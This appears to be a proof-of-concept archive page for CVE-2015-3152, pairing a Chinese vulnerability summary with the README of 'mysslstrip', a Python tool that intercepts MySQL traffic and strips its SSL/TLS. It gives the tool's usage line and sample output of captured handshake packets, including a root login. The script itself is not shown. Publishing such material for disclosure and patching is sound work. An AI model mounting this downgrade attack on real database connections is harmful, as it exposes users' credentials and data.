CVE-2015-3152 PoC — 多款Oracle产品安全漏洞

Source

Associated Vulnerability

Title:多款Oracle产品安全漏洞 (CVE-2015-3152)
Description:Oracle MySQL和MariaDB都是数据库管理系统。Oracle MySQL Connector/C（又名libmysqlclient）是使用C开发的一个客户端库。MySQL和Oracle MySQL Connector/C都是美国甲骨文（Oracle）公司的产品。MariaDB是美国Monty Program Ab公司和美国MariaDB基金会共同开发的产品。多款Oracle产品中存在安全漏洞，该漏洞源于程序使用--ssl选项表示SSL是可选择的。攻击者可通过实施cleartext-downg

Description

CVE-2015-3152 PoC

Readme

# mysslstrip

mysslstrip is a Python-based proof of concept showing how to MITM
MySQL traffic and strip SSL/TLS, as per [CVE-2015-3152](http://www.openwall.com/lists/oss-security/2015/04/29/4).

## Usage

`mysslstrip.py [-h] [-p LISTEN_PORT] [-i LISTEN_INTERFACE] dest`

## Example Output

```
[root@duo1 ~]# python2.7 mysslstrip.py -p 3307 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] Log opened.
2015-04-29 21:33:14+0000 [-] listen: 127.0.0.1:3307; connect: 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] MySQLForwardServerFactory starting on 3307
2015-04-29 21:33:14+0000 [-] Starting factory <__main__.MySQLForwardServerFactory instance at 0x7f7769912fc8>
2015-04-29 21:33:21+0000 [__main__.MySQLForwardServerFactory] Starting factory <twisted.internet.endpoints.OneShotFactory instance at 0x7f776787c248>
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: 'J\x00\x00\x00\n5.6.21\x00\x04\x00\x00\x00"l{I8{%D\x00\xff\xff\x08\x02\x00\x7f\xc0\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00fSPsur[Rg/S6\x00mysql_native_password\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\xb6\x00\x00\x01\x85\xa6\x7f@\x00\x00\x00\x01!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x14U\xe7\x0b\x0cs\xb5\xf3\x00\x07&=\xa8\xa6\xf9I\xf0\x86}G\xffmysql_native_password\x00e\x03_os\x05Linux\x0c_client_name\x08libmysql\x04_pid\x042361\x0f_client_version\x065.6.21\t_platform\x06x86_64\x0cprogram_name\x05mysql'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x07\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '!\x00\x00\x00\x03select @@version_comment limit 1'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: "\x01\x00\x00\x01\x01'\x00\x00\x02\x03def\x00\x00\x00\x11@@version_comment\x00\x0c!\x00x\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00)\x00\x00\x04(Distributed by The IUS Community Project\x05\x00\x00\x05\xfe\x00\x00\x02\x00"
2015-04-29 21:33:27+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x16\x00\x00\x00\x03SELECT "HELLO, WORLD"'
2015-04-29 21:33:27+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x01\x00\x00\x01\x01"\x00\x00\x02\x03def\x00\x00\x00\x0cHELLO, WORLD\x00\x0c!\x00$\x00\x00\x00\xfd\x01\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00\r\x00\x00\x04\x0cHELLO, WORLD\x05\x00\x00\x05\xfe\x00\x00\x02\x00'
2015-04-29 21:33:33+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x01\x00\x00\x00\x01'
```

## Additional Information


**Is this a real vulnerability?**

Yes! Encrypt all the things. Allowing opportunistic degradation of encryption is pretty poor practice.

The vulnerability affects MySQL 5.7.2 and earlier versions, along with MySQL Connector versions 6.1.2 and earlier, all versions of Percona Server and all versions of MariaDB.

**Patch?**

It's been fixed in [MySQL 5.7.3](http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-3.html) ... but the security
patch hasn't been backported to any other version, so if you're on 5.6 like [99.99%](https://scans.io/data/umich/dadrian/backronym/banners.mysql.20150429.json) of the Internet is, you're out of
luck unless you switch to the 5.7 "preview release".

Created by [Adam Goodman](https://twitter.com/akgood) of [Duo Labs](https://labs.duosecurity.com).

**Inquiries?**

PR Inquiries: [this.is.a.really.big.deal@duosecurity.com](mailto:this.is.a.really.big.deal@duosecurity.com)  
Technical Inquiries: [this.isnt.a.big.deal.but.you.should.still.patch@duosecurity.com](mailto:this.isnt.a.big.deal.but.you.should.still.patch@duosecurity.com)  
Twitters: [@duo\_labs](https://twitter.com/duo_labs)

### References

[http://backronym.fail](http://backronym.fail)  
[https://www.duosecurity.com/blog/backronym-mysql-vulnerability](https://www.duosecurity.com/blog/backronym-mysql-vulnerability)  
[http://www.openwall.com/lists/oss-security/2015/04/29/4](http://www.openwall.com/lists/oss-security/2015/04/29/4)  
[http://www.ocert.org/advisories/ocert-2015-003.html](http://www.ocert.org/advisories/ocert-2015-003.html)  
[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152)

File Snapshot


 [4.0K]  /data/pocs/232f27510be14cb51a34ad3650ced68b287bc2cf
├── [8.9K]  mysslstrip.py
├── [4.5K]  README.md
└── [  34]  requirements.txt

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!